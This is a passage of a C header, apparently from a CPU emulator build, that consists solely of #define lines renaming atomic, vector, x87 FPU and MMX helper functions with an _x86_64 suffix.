#define helper_atomic_fetch_umaxw_le helper_atomic_fetch_umaxw_le_x86_64
#define helper_atomic_smin_fetchw_le helper_atomic_smin_fetchw_le_x86_64
#define helper_atomic_umin_fetchw_le helper_atomic_umin_fetchw_le_x86_64
#define helper_atomic_smax_fetchw_le helper_atomic_smax_fetchw_le_x86_64
#define helper_atomic_umax_fetchw_le helper_atomic_umax_fetchw_le_x86_64
#define helper_atomic_cmpxchgw_be helper_atomic_cmpxchgw_be_x86_64
#define helper_atomic_xchgw_be helper_atomic_xchgw_be_x86_64
#define helper_atomic_fetch_andw_be helper_atomic_fetch_andw_be_x86_64
#define helper_atomic_fetch_orw_be helper_atomic_fetch_orw_be_x86_64
#define helper_atomic_fetch_xorw_be helper_atomic_fetch_xorw_be_x86_64
#define helper_atomic_and_fetchw_be helper_atomic_and_fetchw_be_x86_64
#define helper_atomic_or_fetchw_be helper_atomic_or_fetchw_be_x86_64
#define helper_atomic_xor_fetchw_be helper_atomic_xor_fetchw_be_x86_64
#define helper_atomic_fetch_sminw_be helper_atomic_fetch_sminw_be_x86_64
#define helper_atomic_fetch_uminw_be helper_atomic_fetch_uminw_be_x86_64
#define helper_atomic_fetch_smaxw_be helper_atomic_fetch_smaxw_be_x86_64
#define helper_atomic_fetch_umaxw_be helper_atomic_fetch_umaxw_be_x86_64
#define helper_atomic_smin_fetchw_be helper_atomic_smin_fetchw_be_x86_64
#define helper_atomic_umin_fetchw_be helper_atomic_umin_fetchw_be_x86_64
#define helper_atomic_smax_fetchw_be helper_atomic_smax_fetchw_be_x86_64
#define helper_atomic_umax_fetchw_be helper_atomic_umax_fetchw_be_x86_64
#define helper_atomic_fetch_addw_be helper_atomic_fetch_addw_be_x86_64
#define helper_atomic_add_fetchw_be helper_atomic_add_fetchw_be_x86_64
#define helper_atomic_cmpxchgl_le helper_atomic_cmpxchgl_le_x86_64
#define helper_atomic_xchgl_le helper_atomic_xchgl_le_x86_64
#define helper_atomic_fetch_addl_le helper_atomic_fetch_addl_le_x86_64
#define helper_atomic_fetch_andl_le helper_atomic_fetch_andl_le_x86_64
#define helper_atomic_fetch_orl_le helper_atomic_fetch_orl_le_x86_64
#define helper_atomic_fetch_xorl_le helper_atomic_fetch_xorl_le_x86_64
#define helper_atomic_add_fetchl_le helper_atomic_add_fetchl_le_x86_64
#define helper_atomic_and_fetchl_le helper_atomic_and_fetchl_le_x86_64
#define helper_atomic_or_fetchl_le helper_atomic_or_fetchl_le_x86_64
#define helper_atomic_xor_fetchl_le helper_atomic_xor_fetchl_le_x86_64
#define helper_atomic_fetch_sminl_le helper_atomic_fetch_sminl_le_x86_64
#define helper_atomic_fetch_uminl_le helper_atomic_fetch_uminl_le_x86_64
#define helper_atomic_fetch_smaxl_le helper_atomic_fetch_smaxl_le_x86_64
#define helper_atomic_fetch_umaxl_le helper_atomic_fetch_umaxl_le_x86_64
#define helper_atomic_smin_fetchl_le helper_atomic_smin_fetchl_le_x86_64
#define helper_atomic_umin_fetchl_le helper_atomic_umin_fetchl_le_x86_64
#define helper_atomic_smax_fetchl_le helper_atomic_smax_fetchl_le_x86_64
#define helper_atomic_umax_fetchl_le helper_atomic_umax_fetchl_le_x86_64
#define helper_atomic_cmpxchgl_be helper_atomic_cmpxchgl_be_x86_64
#define helper_atomic_xchgl_be helper_atomic_xchgl_be_x86_64
#define helper_atomic_fetch_andl_be helper_atomic_fetch_andl_be_x86_64
#define helper_atomic_fetch_orl_be helper_atomic_fetch_orl_be_x86_64
#define helper_atomic_fetch_xorl_be helper_atomic_fetch_xorl_be_x86_64
#define helper_atomic_and_fetchl_be helper_atomic_and_fetchl_be_x86_64
#define helper_atomic_or_fetchl_be helper_atomic_or_fetchl_be_x86_64
#define helper_atomic_xor_fetchl_be helper_atomic_xor_fetchl_be_x86_64
#define helper_atomic_fetch_sminl_be helper_atomic_fetch_sminl_be_x86_64
#define helper_atomic_fetch_uminl_be helper_atomic_fetch_uminl_be_x86_64
#define helper_atomic_fetch_smaxl_be helper_atomic_fetch_smaxl_be_x86_64
#define helper_atomic_fetch_umaxl_be helper_atomic_fetch_umaxl_be_x86_64
#define helper_atomic_smin_fetchl_be helper_atomic_smin_fetchl_be_x86_64
#define helper_atomic_umin_fetchl_be helper_atomic_umin_fetchl_be_x86_64
#define helper_atomic_smax_fetchl_be helper_atomic_smax_fetchl_be_x86_64
#define helper_atomic_umax_fetchl_be helper_atomic_umax_fetchl_be_x86_64
#define helper_atomic_fetch_addl_be helper_atomic_fetch_addl_be_x86_64
#define helper_atomic_add_fetchl_be helper_atomic_add_fetchl_be_x86_64
#define helper_atomic_cmpxchgq_le helper_atomic_cmpxchgq_le_x86_64
#define helper_atomic_xchgq_le helper_atomic_xchgq_le_x86_64
#define helper_atomic_fetch_addq_le helper_atomic_fetch_addq_le_x86_64
#define helper_atomic_fetch_andq_le helper_atomic_fetch_andq_le_x86_64
#define helper_atomic_fetch_orq_le helper_atomic_fetch_orq_le_x86_64
#define helper_atomic_fetch_xorq_le helper_atomic_fetch_xorq_le_x86_64
#define helper_atomic_add_fetchq_le helper_atomic_add_fetchq_le_x86_64
#define helper_atomic_and_fetchq_le helper_atomic_and_fetchq_le_x86_64
#define helper_atomic_or_fetchq_le helper_atomic_or_fetchq_le_x86_64
#define helper_atomic_xor_fetchq_le helper_atomic_xor_fetchq_le_x86_64
#define helper_atomic_fetch_sminq_le helper_atomic_fetch_sminq_le_x86_64
#define helper_atomic_fetch_uminq_le helper_atomic_fetch_uminq_le_x86_64
#define helper_atomic_fetch_smaxq_le helper_atomic_fetch_smaxq_le_x86_64
#define helper_atomic_fetch_umaxq_le helper_atomic_fetch_umaxq_le_x86_64
#define helper_atomic_smin_fetchq_le helper_atomic_smin_fetchq_le_x86_64
#define helper_atomic_umin_fetchq_le helper_atomic_umin_fetchq_le_x86_64
#define helper_atomic_smax_fetchq_le helper_atomic_smax_fetchq_le_x86_64
#define helper_atomic_umax_fetchq_le helper_atomic_umax_fetchq_le_x86_64
#define helper_atomic_cmpxchgq_be helper_atomic_cmpxchgq_be_x86_64
#define helper_atomic_xchgq_be helper_atomic_xchgq_be_x86_64
#define helper_atomic_fetch_andq_be helper_atomic_fetch_andq_be_x86_64
#define helper_atomic_fetch_orq_be helper_atomic_fetch_orq_be_x86_64
#define helper_atomic_fetch_xorq_be helper_atomic_fetch_xorq_be_x86_64
#define helper_atomic_and_fetchq_be helper_atomic_and_fetchq_be_x86_64
#define helper_atomic_or_fetchq_be helper_atomic_or_fetchq_be_x86_64
#define helper_atomic_xor_fetchq_be helper_atomic_xor_fetchq_be_x86_64
#define helper_atomic_fetch_sminq_be helper_atomic_fetch_sminq_be_x86_64
#define helper_atomic_fetch_uminq_be helper_atomic_fetch_uminq_be_x86_64
#define helper_atomic_fetch_smaxq_be helper_atomic_fetch_smaxq_be_x86_64
#define helper_atomic_fetch_umaxq_be helper_atomic_fetch_umaxq_be_x86_64
#define helper_atomic_smin_fetchq_be helper_atomic_smin_fetchq_be_x86_64
#define helper_atomic_umin_fetchq_be helper_atomic_umin_fetchq_be_x86_64
#define helper_atomic_smax_fetchq_be helper_atomic_smax_fetchq_be_x86_64
#define helper_atomic_umax_fetchq_be helper_atomic_umax_fetchq_be_x86_64
#define helper_atomic_fetch_addq_be helper_atomic_fetch_addq_be_x86_64
#define helper_atomic_add_fetchq_be helper_atomic_add_fetchq_be_x86_64
#define cpu_ldub_code cpu_ldub_code_x86_64
#define cpu_lduw_code cpu_lduw_code_x86_64
#define cpu_ldl_code cpu_ldl_code_x86_64
#define cpu_ldq_code cpu_ldq_code_x86_64
#define helper_div_i32 helper_div_i32_x86_64
#define helper_rem_i32 helper_rem_i32_x86_64
#define helper_divu_i32 helper_divu_i32_x86_64
#define helper_remu_i32 helper_remu_i32_x86_64
#define helper_shl_i64 helper_shl_i64_x86_64
#define helper_shr_i64 helper_shr_i64_x86_64
#define helper_sar_i64 helper_sar_i64_x86_64
#define helper_div_i64 helper_div_i64_x86_64
#define helper_rem_i64 helper_rem_i64_x86_64
#define helper_divu_i64 helper_divu_i64_x86_64
#define helper_remu_i64 helper_remu_i64_x86_64
#define helper_muluh_i64 helper_muluh_i64_x86_64
#define helper_mulsh_i64 helper_mulsh_i64_x86_64
#define helper_clz_i32 helper_clz_i32_x86_64
#define helper_ctz_i32 helper_ctz_i32_x86_64
#define helper_clz_i64 helper_clz_i64_x86_64
#define helper_ctz_i64 helper_ctz_i64_x86_64
#define helper_clrsb_i32 helper_clrsb_i32_x86_64
#define helper_clrsb_i64 helper_clrsb_i64_x86_64
#define helper_ctpop_i32 helper_ctpop_i32_x86_64
#define helper_ctpop_i64 helper_ctpop_i64_x86_64
#define helper_lookup_tb_ptr helper_lookup_tb_ptr_x86_64
#define helper_exit_atomic helper_exit_atomic_x86_64
#define helper_gvec_add8 helper_gvec_add8_x86_64
#define helper_gvec_add16 helper_gvec_add16_x86_64
#define helper_gvec_add32 helper_gvec_add32_x86_64
#define helper_gvec_add64 helper_gvec_add64_x86_64
#define helper_gvec_adds8 helper_gvec_adds8_x86_64
#define helper_gvec_adds16 helper_gvec_adds16_x86_64
#define helper_gvec_adds32 helper_gvec_adds32_x86_64
#define helper_gvec_adds64 helper_gvec_adds64_x86_64
#define helper_gvec_sub8 helper_gvec_sub8_x86_64
#define helper_gvec_sub16 helper_gvec_sub16_x86_64
#define helper_gvec_sub32 helper_gvec_sub32_x86_64
#define helper_gvec_sub64 helper_gvec_sub64_x86_64
#define helper_gvec_subs8 helper_gvec_subs8_x86_64
#define helper_gvec_subs16 helper_gvec_subs16_x86_64
#define helper_gvec_subs32 helper_gvec_subs32_x86_64
#define helper_gvec_subs64 helper_gvec_subs64_x86_64
#define helper_gvec_mul8 helper_gvec_mul8_x86_64
#define helper_gvec_mul16 helper_gvec_mul16_x86_64
#define helper_gvec_mul32 helper_gvec_mul32_x86_64
#define helper_gvec_mul64 helper_gvec_mul64_x86_64
#define helper_gvec_muls8 helper_gvec_muls8_x86_64
#define helper_gvec_muls16 helper_gvec_muls16_x86_64
#define helper_gvec_muls32 helper_gvec_muls32_x86_64
#define helper_gvec_muls64 helper_gvec_muls64_x86_64
#define helper_gvec_neg8 helper_gvec_neg8_x86_64
#define helper_gvec_neg16 helper_gvec_neg16_x86_64
#define helper_gvec_neg32 helper_gvec_neg32_x86_64
#define helper_gvec_neg64 helper_gvec_neg64_x86_64
#define helper_gvec_abs8 helper_gvec_abs8_x86_64
#define helper_gvec_abs16 helper_gvec_abs16_x86_64
#define helper_gvec_abs32 helper_gvec_abs32_x86_64
#define helper_gvec_abs64 helper_gvec_abs64_x86_64
#define helper_gvec_mov helper_gvec_mov_x86_64
#define helper_gvec_dup64 helper_gvec_dup64_x86_64
#define helper_gvec_dup32 helper_gvec_dup32_x86_64
#define helper_gvec_dup16 helper_gvec_dup16_x86_64
#define helper_gvec_dup8 helper_gvec_dup8_x86_64
#define helper_gvec_not helper_gvec_not_x86_64
#define helper_gvec_and helper_gvec_and_x86_64
#define helper_gvec_or helper_gvec_or_x86_64
#define helper_gvec_xor helper_gvec_xor_x86_64
#define helper_gvec_andc helper_gvec_andc_x86_64
#define helper_gvec_orc helper_gvec_orc_x86_64
#define helper_gvec_nand helper_gvec_nand_x86_64
#define helper_gvec_nor helper_gvec_nor_x86_64
#define helper_gvec_eqv helper_gvec_eqv_x86_64
#define helper_gvec_ands helper_gvec_ands_x86_64
#define helper_gvec_xors helper_gvec_xors_x86_64
#define helper_gvec_ors helper_gvec_ors_x86_64
#define helper_gvec_shl8i helper_gvec_shl8i_x86_64
#define helper_gvec_shl16i helper_gvec_shl16i_x86_64
#define helper_gvec_shl32i helper_gvec_shl32i_x86_64
#define helper_gvec_shl64i helper_gvec_shl64i_x86_64
#define helper_gvec_shr8i helper_gvec_shr8i_x86_64
#define helper_gvec_shr16i helper_gvec_shr16i_x86_64
#define helper_gvec_shr32i helper_gvec_shr32i_x86_64
#define helper_gvec_shr64i helper_gvec_shr64i_x86_64
#define helper_gvec_sar8i helper_gvec_sar8i_x86_64
#define helper_gvec_sar16i helper_gvec_sar16i_x86_64
#define helper_gvec_sar32i helper_gvec_sar32i_x86_64
#define helper_gvec_sar64i helper_gvec_sar64i_x86_64
#define helper_gvec_shl8v helper_gvec_shl8v_x86_64
#define helper_gvec_shl16v helper_gvec_shl16v_x86_64
#define helper_gvec_shl32v helper_gvec_shl32v_x86_64
#define helper_gvec_shl64v helper_gvec_shl64v_x86_64
#define helper_gvec_shr8v helper_gvec_shr8v_x86_64
#define helper_gvec_shr16v helper_gvec_shr16v_x86_64
#define helper_gvec_shr32v helper_gvec_shr32v_x86_64
#define helper_gvec_shr64v helper_gvec_shr64v_x86_64
#define helper_gvec_sar8v helper_gvec_sar8v_x86_64
#define helper_gvec_sar16v helper_gvec_sar16v_x86_64
#define helper_gvec_sar32v helper_gvec_sar32v_x86_64
#define helper_gvec_sar64v helper_gvec_sar64v_x86_64
#define helper_gvec_eq8 helper_gvec_eq8_x86_64
#define helper_gvec_ne8 helper_gvec_ne8_x86_64
#define helper_gvec_lt8 helper_gvec_lt8_x86_64
#define helper_gvec_le8 helper_gvec_le8_x86_64
#define helper_gvec_ltu8 helper_gvec_ltu8_x86_64
#define helper_gvec_leu8 helper_gvec_leu8_x86_64
#define helper_gvec_eq16 helper_gvec_eq16_x86_64
#define helper_gvec_ne16 helper_gvec_ne16_x86_64
#define helper_gvec_lt16 helper_gvec_lt16_x86_64
#define helper_gvec_le16 helper_gvec_le16_x86_64
#define helper_gvec_ltu16 helper_gvec_ltu16_x86_64
#define helper_gvec_leu16 helper_gvec_leu16_x86_64
#define helper_gvec_eq32 helper_gvec_eq32_x86_64
#define helper_gvec_ne32 helper_gvec_ne32_x86_64
#define helper_gvec_lt32 helper_gvec_lt32_x86_64
#define helper_gvec_le32 helper_gvec_le32_x86_64
#define helper_gvec_ltu32 helper_gvec_ltu32_x86_64
#define helper_gvec_leu32 helper_gvec_leu32_x86_64
#define helper_gvec_eq64 helper_gvec_eq64_x86_64
#define helper_gvec_ne64 helper_gvec_ne64_x86_64
#define helper_gvec_lt64 helper_gvec_lt64_x86_64
#define helper_gvec_le64 helper_gvec_le64_x86_64
#define helper_gvec_ltu64 helper_gvec_ltu64_x86_64
#define helper_gvec_leu64 helper_gvec_leu64_x86_64
#define helper_gvec_ssadd8 helper_gvec_ssadd8_x86_64
#define helper_gvec_ssadd16 helper_gvec_ssadd16_x86_64
#define helper_gvec_ssadd32 helper_gvec_ssadd32_x86_64
#define helper_gvec_ssadd64 helper_gvec_ssadd64_x86_64
#define helper_gvec_sssub8 helper_gvec_sssub8_x86_64
#define helper_gvec_sssub16 helper_gvec_sssub16_x86_64
#define helper_gvec_sssub32 helper_gvec_sssub32_x86_64
#define helper_gvec_sssub64 helper_gvec_sssub64_x86_64
#define helper_gvec_usadd8 helper_gvec_usadd8_x86_64
#define helper_gvec_usadd16 helper_gvec_usadd16_x86_64
#define helper_gvec_usadd32 helper_gvec_usadd32_x86_64
#define helper_gvec_usadd64 helper_gvec_usadd64_x86_64
#define helper_gvec_ussub8 helper_gvec_ussub8_x86_64
#define helper_gvec_ussub16 helper_gvec_ussub16_x86_64
#define helper_gvec_ussub32 helper_gvec_ussub32_x86_64
#define helper_gvec_ussub64 helper_gvec_ussub64_x86_64
#define helper_gvec_smin8 helper_gvec_smin8_x86_64
#define helper_gvec_smin16 helper_gvec_smin16_x86_64
#define helper_gvec_smin32 helper_gvec_smin32_x86_64
#define helper_gvec_smin64 helper_gvec_smin64_x86_64
#define helper_gvec_smax8 helper_gvec_smax8_x86_64
#define helper_gvec_smax16 helper_gvec_smax16_x86_64
#define helper_gvec_smax32 helper_gvec_smax32_x86_64
#define helper_gvec_smax64 helper_gvec_smax64_x86_64
#define helper_gvec_umin8 helper_gvec_umin8_x86_64
#define helper_gvec_umin16 helper_gvec_umin16_x86_64
#define helper_gvec_umin32 helper_gvec_umin32_x86_64
#define helper_gvec_umin64 helper_gvec_umin64_x86_64
#define helper_gvec_umax8 helper_gvec_umax8_x86_64
#define helper_gvec_umax16 helper_gvec_umax16_x86_64
#define helper_gvec_umax32 helper_gvec_umax32_x86_64
#define helper_gvec_umax64 helper_gvec_umax64_x86_64
#define helper_gvec_bitsel helper_gvec_bitsel_x86_64
#define cpu_restore_state cpu_restore_state_x86_64
#define page_collection_lock page_collection_lock_x86_64
#define page_collection_unlock page_collection_unlock_x86_64
#define free_code_gen_buffer free_code_gen_buffer_x86_64
#define tcg_exec_init tcg_exec_init_x86_64
#define tb_cleanup tb_cleanup_x86_64
#define tb_flush tb_flush_x86_64
#define tb_phys_invalidate tb_phys_invalidate_x86_64
#define tb_gen_code tb_gen_code_x86_64
#define tb_exec_lock tb_exec_lock_x86_64
#define tb_exec_unlock tb_exec_unlock_x86_64
#define tb_invalidate_phys_page_range tb_invalidate_phys_page_range_x86_64
#define tb_invalidate_phys_range tb_invalidate_phys_range_x86_64
#define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_x86_64
#define tb_check_watchpoint tb_check_watchpoint_x86_64
#define cpu_io_recompile cpu_io_recompile_x86_64
#define tb_flush_jmp_cache tb_flush_jmp_cache_x86_64
#define tcg_flush_softmmu_tlb tcg_flush_softmmu_tlb_x86_64
#define translator_loop_temp_check translator_loop_temp_check_x86_64
#define translator_loop translator_loop_x86_64
#define helper_atomic_cmpxchgo_le_mmu helper_atomic_cmpxchgo_le_mmu_x86_64
#define helper_atomic_cmpxchgo_be_mmu helper_atomic_cmpxchgo_be_mmu_x86_64
#define helper_atomic_ldo_le_mmu helper_atomic_ldo_le_mmu_x86_64
#define helper_atomic_ldo_be_mmu helper_atomic_ldo_be_mmu_x86_64
#define helper_atomic_sto_le_mmu helper_atomic_sto_le_mmu_x86_64
#define helper_atomic_sto_be_mmu helper_atomic_sto_be_mmu_x86_64
#define unassigned_mem_ops unassigned_mem_ops_x86_64
#define floatx80_infinity floatx80_infinity_x86_64
#define dup_const_func dup_const_func_x86_64
#define gen_helper_raise_exception gen_helper_raise_exception_x86_64
#define gen_helper_raise_interrupt gen_helper_raise_interrupt_x86_64
#define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_x86_64
#define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_x86_64
#define gen_helper_cpsr_read gen_helper_cpsr_read_x86_64
#define gen_helper_cpsr_write gen_helper_cpsr_write_x86_64
#define tlb_reset_dirty_by_vaddr tlb_reset_dirty_by_vaddr_x86_64
#define cpu_get_tsc cpu_get_tsc_x86_64
#define x86_cpu_get_memory_mapping x86_cpu_get_memory_mapping_x86_64
#define cpu_x86_update_dr7 cpu_x86_update_dr7_x86_64
#define breakpoint_handler breakpoint_handler_x86_64
#define helper_single_step helper_single_step_x86_64
#define helper_rechecking_single_step helper_rechecking_single_step_x86_64
#define helper_set_dr helper_set_dr_x86_64
#define helper_get_dr helper_get_dr_x86_64
#define helper_bpt_io helper_bpt_io_x86_64
#define helper_cc_compute_all helper_cc_compute_all_x86_64
#define cpu_cc_compute_all cpu_cc_compute_all_x86_64
#define helper_cc_compute_c helper_cc_compute_c_x86_64
#define helper_write_eflags helper_write_eflags_x86_64
#define helper_read_eflags helper_read_eflags_x86_64
#define helper_clts helper_clts_x86_64
#define helper_reset_rf helper_reset_rf_x86_64
#define helper_cli helper_cli_x86_64
#define helper_sti helper_sti_x86_64
#define helper_clac helper_clac_x86_64
#define helper_stac helper_stac_x86_64
#define get_register_name_32 get_register_name_32_x86_64
#define host_cpuid host_cpuid_x86_64
#define host_vendor_fms host_vendor_fms_x86_64
#define x86_cpu_set_default_version x86_cpu_set_default_version_x86_64
#define cpu_clear_apic_feature cpu_clear_apic_feature_x86_64
#define cpu_x86_cpuid cpu_x86_cpuid_x86_64
#define x86_cpu_pending_interrupt x86_cpu_pending_interrupt_x86_64
#define x86_update_hflags x86_update_hflags_x86_64
#define cpu_x86_init cpu_x86_init_x86_64
#define helper_raise_interrupt helper_raise_interrupt_x86_64
#define helper_raise_exception helper_raise_exception_x86_64
#define raise_interrupt raise_interrupt_x86_64
#define raise_exception_err raise_exception_err_x86_64
#define raise_exception_err_ra raise_exception_err_ra_x86_64
#define raise_exception raise_exception_x86_64
#define raise_exception_ra raise_exception_ra_x86_64
#define x86_cpu_tlb_fill x86_cpu_tlb_fill_x86_64
#define cpu_set_ignne cpu_set_ignne_x86_64
#define helper_flds_FT0 helper_flds_FT0_x86_64
#define helper_fldl_FT0 helper_fldl_FT0_x86_64
#define helper_fildl_FT0 helper_fildl_FT0_x86_64
#define helper_flds_ST0 helper_flds_ST0_x86_64
#define helper_fldl_ST0 helper_fldl_ST0_x86_64
#define helper_fildl_ST0 helper_fildl_ST0_x86_64
#define helper_fildll_ST0 helper_fildll_ST0_x86_64
#define helper_fsts_ST0 helper_fsts_ST0_x86_64
#define helper_fstl_ST0 helper_fstl_ST0_x86_64
#define helper_fist_ST0 helper_fist_ST0_x86_64
#define helper_fistl_ST0 helper_fistl_ST0_x86_64
#define helper_fistll_ST0 helper_fistll_ST0_x86_64
#define helper_fistt_ST0 helper_fistt_ST0_x86_64
#define helper_fisttl_ST0 helper_fisttl_ST0_x86_64
#define helper_fisttll_ST0 helper_fisttll_ST0_x86_64
#define helper_fldt_ST0 helper_fldt_ST0_x86_64
#define helper_fstt_ST0 helper_fstt_ST0_x86_64
#define helper_fpush helper_fpush_x86_64
#define helper_fpop helper_fpop_x86_64
#define helper_fdecstp helper_fdecstp_x86_64
#define helper_fincstp helper_fincstp_x86_64
#define helper_ffree_STN helper_ffree_STN_x86_64
#define helper_fmov_ST0_FT0 helper_fmov_ST0_FT0_x86_64
#define helper_fmov_FT0_STN helper_fmov_FT0_STN_x86_64
#define helper_fmov_ST0_STN helper_fmov_ST0_STN_x86_64
#define helper_fmov_STN_ST0 helper_fmov_STN_ST0_x86_64
#define helper_fxchg_ST0_STN helper_fxchg_ST0_STN_x86_64
#define helper_fcom_ST0_FT0 helper_fcom_ST0_FT0_x86_64
#define helper_fucom_ST0_FT0 helper_fucom_ST0_FT0_x86_64
#define helper_fcomi_ST0_FT0 helper_fcomi_ST0_FT0_x86_64
#define helper_fucomi_ST0_FT0 helper_fucomi_ST0_FT0_x86_64
#define helper_fadd_ST0_FT0 helper_fadd_ST0_FT0_x86_64
#define helper_fmul_ST0_FT0 helper_fmul_ST0_FT0_x86_64
#define helper_fsub_ST0_FT0 helper_fsub_ST0_FT0_x86_64
#define helper_fsubr_ST0_FT0 helper_fsubr_ST0_FT0_x86_64
#define helper_fdiv_ST0_FT0 helper_fdiv_ST0_FT0_x86_64
#define helper_fdivr_ST0_FT0 helper_fdivr_ST0_FT0_x86_64
#define helper_fadd_STN_ST0 helper_fadd_STN_ST0_x86_64
#define helper_fmul_STN_ST0 helper_fmul_STN_ST0_x86_64
#define helper_fsub_STN_ST0 helper_fsub_STN_ST0_x86_64
#define helper_fsubr_STN_ST0 helper_fsubr_STN_ST0_x86_64
#define helper_fdiv_STN_ST0 helper_fdiv_STN_ST0_x86_64
#define helper_fdivr_STN_ST0 helper_fdivr_STN_ST0_x86_64
#define helper_fchs_ST0 helper_fchs_ST0_x86_64
#define helper_fabs_ST0 helper_fabs_ST0_x86_64
#define helper_fld1_ST0 helper_fld1_ST0_x86_64
#define helper_fldl2t_ST0 helper_fldl2t_ST0_x86_64
#define helper_fldl2e_ST0 helper_fldl2e_ST0_x86_64
#define helper_fldpi_ST0 helper_fldpi_ST0_x86_64
#define helper_fldlg2_ST0 helper_fldlg2_ST0_x86_64
#define helper_fldln2_ST0 helper_fldln2_ST0_x86_64
#define helper_fldz_ST0 helper_fldz_ST0_x86_64
#define helper_fldz_FT0 helper_fldz_FT0_x86_64
#define helper_fnstsw helper_fnstsw_x86_64
#define helper_fnstcw helper_fnstcw_x86_64
#define update_fp_status update_fp_status_x86_64
#define helper_fldcw helper_fldcw_x86_64
#define helper_fclex helper_fclex_x86_64
#define helper_fwait helper_fwait_x86_64
#define helper_fninit helper_fninit_x86_64
#define helper_fbld_ST0 helper_fbld_ST0_x86_64
#define helper_fbst_ST0 helper_fbst_ST0_x86_64
#define helper_f2xm1 helper_f2xm1_x86_64
#define helper_fyl2x helper_fyl2x_x86_64
#define helper_fptan helper_fptan_x86_64
#define helper_fpatan helper_fpatan_x86_64
#define helper_fxtract helper_fxtract_x86_64
#define helper_fprem1 helper_fprem1_x86_64
#define helper_fprem helper_fprem_x86_64
#define helper_fyl2xp1 helper_fyl2xp1_x86_64
#define helper_fsqrt helper_fsqrt_x86_64
#define helper_fsincos helper_fsincos_x86_64
#define helper_frndint helper_frndint_x86_64
#define helper_fscale helper_fscale_x86_64
#define helper_fsin helper_fsin_x86_64
#define helper_fcos helper_fcos_x86_64
#define helper_fxam_ST0 helper_fxam_ST0_x86_64
#define helper_fstenv helper_fstenv_x86_64
#define helper_fldenv helper_fldenv_x86_64
#define helper_fsave helper_fsave_x86_64
#define helper_frstor helper_frstor_x86_64
#define helper_fxsave helper_fxsave_x86_64
#define helper_xsave helper_xsave_x86_64
#define helper_xsaveopt helper_xsaveopt_x86_64
#define helper_fxrstor helper_fxrstor_x86_64
#define helper_xrstor helper_xrstor_x86_64
#define helper_xgetbv helper_xgetbv_x86_64
#define helper_xsetbv helper_xsetbv_x86_64
#define update_mxcsr_status update_mxcsr_status_x86_64
#define helper_ldmxcsr helper_ldmxcsr_x86_64
#define helper_enter_mmx helper_enter_mmx_x86_64
#define helper_emms helper_emms_x86_64
#define helper_movq helper_movq_x86_64
#define helper_psrlw_mmx helper_psrlw_mmx_x86_64
#define helper_psraw_mmx helper_psraw_mmx_x86_64
#define helper_psllw_mmx helper_psllw_mmx_x86_64
#define helper_psrld_mmx helper_psrld_mmx_x86_64
#define helper_psrad_mmx helper_psrad_mmx_x86_64
#define helper_pslld_mmx helper_pslld_mmx_x86_64
#define helper_psrlq_mmx helper_psrlq_mmx_x86_64
#define helper_psllq_mmx helper_psllq_mmx_x86_64
#define helper_paddb_mmx helper_paddb_mmx_x86_64
#define helper_paddw_mmx helper_paddw_mmx_x86_64
#define helper_paddl_mmx helper_paddl_mmx_x86_64
#define helper_paddq_mmx helper_paddq_mmx_x86_64
#define helper_psubb_mmx helper_psubb_mmx_x86_64
#define helper_psubw_mmx helper_psubw_mmx_x86_64
#define helper_psubl_mmx helper_psubl_mmx_x86_64
#define helper_psubq_mmx helper_psubq_mmx_x86_64
#define helper_paddusb_mmx helper_paddusb_mmx_x86_64
#define helper_paddsb_mmx helper_paddsb_mmx_x86_64
#define helper_psubusb_mmx helper_psubusb_mmx_x86_64
#define helper_psubsb_mmx helper_psubsb_mmx_x86_64
#define helper_paddusw_mmx helper_paddusw_mmx_x86_64
#define helper_paddsw_mmx helper_paddsw_mmx_x86_64
#define helper_psubusw_mmx helper_psubusw_mmx_x86_64
#define helper_psubsw_mmx helper_psubsw_mmx_x86_64
#define helper_pminub_mmx helper_pminub_mmx_x86_64
#define helper_pmaxub_mmx helper_pmaxub_mmx_x86_64
#define helper_pminsw_mmx helper_pminsw_mmx_x86_64
#define helper_pmaxsw_mmx helper_pmaxsw_mmx_x86_64
#define helper_pand_mmx helper_pand_mmx_x86_64
#define helper_pandn_mmx helper_pandn_mmx_x86_64
#define helper_por_mmx helper_por_mmx_x86_64
#define helper_pxor_mmx helper_pxor_mmx_x86_64
#define helper_pcmpgtb_mmx helper_pcmpgtb_mmx_x86_64
#define helper_pcmpgtw_mmx helper_pcmpgtw_mmx_x86_64
#define helper_pcmpgtl_mmx helper_pcmpgtl_mmx_x86_64
#define helper_pcmpeqb_mmx helper_pcmpeqb_mmx_x86_64
#define helper_pcmpeqw_mmx helper_pcmpeqw_mmx_x86_64
#define helper_pcmpeql_mmx helper_pcmpeql_mmx_x86_64
#define helper_pmullw_mmx helper_pmullw_mmx_x86_64
#define helper_pmulhrw_mmx helper_pmulhrw_mmx_x86_64
#define helper_pmulhuw_mmx helper_pmulhuw_mmx_x86_64
#define helper_pmulhw_mmx helper_pmulhw_mmx_x86_64
#define helper_pavgb_mmx helper_pavgb_mmx_x86_64
#define helper_pavgw_mmx helper_pavgw_mmx_x86_64
#define helper_pmuludq_mmx helper_pmuludq_mmx_x86_64
#define helper_pmaddwd_mmx helper_pmaddwd_mmx_x86_64
#define helper_psadbw_mmx helper_psadbw_mmx_x86_64
#define helper_maskmov_mmx helper_maskmov_mmx_x86_64
#define helper_movl_mm_T0_mmx helper_movl_mm_T0_mmx_x86_64
#define helper_movq_mm_T0_mmx helper_movq_mm_T0_mmx_x86_64
#define helper_pshufw_mmx helper_pshufw_mmx_x86_64
#define helper_pmovmskb_mmx helper_pmovmskb_mmx_x86_64
#define helper_packsswb_mmx helper_packsswb_mmx_x86_64
#define helper_packuswb_mmx helper_packuswb_mmx_x86_64
#define helper_packssdw_mmx helper_packssdw_mmx_x86_64
#define helper_punpcklbw_mmx helper_punpcklbw_mmx_x86_64
#define helper_punpcklwd_mmx helper_punpcklwd_mmx_x86_64
#define helper_punpckldq_mmx helper_punpckldq_mmx_x86_64
#define helper_punpckhbw_mmx helper_punpckhbw_mmx_x86_64
#define helper_punpckhwd_mmx helper_punpckhwd_mmx_x86_64
#define helper_punpckhdq_mmx helper_punpckhdq_mmx_x86_64
#define helper_pi2fd helper_pi2fd_x86_64
#define helper_pi2fw helper_pi2fw_x86_64
#define helper_pf2id helper_pf2id_x86_64
#define helper_pf2iw helper_pf2iw_x86_64
#define helper_pfacc helper_pfacc_x86_64
#define helper_pfadd helper_pfadd_x86_64
#define helper_pfcmpeq helper_pfcmpeq_x86_64
#define helper_pfcmpge helper_pfcmpge_x86_64
#define helper_pfcmpgt helper_pfcmpgt_x86_64
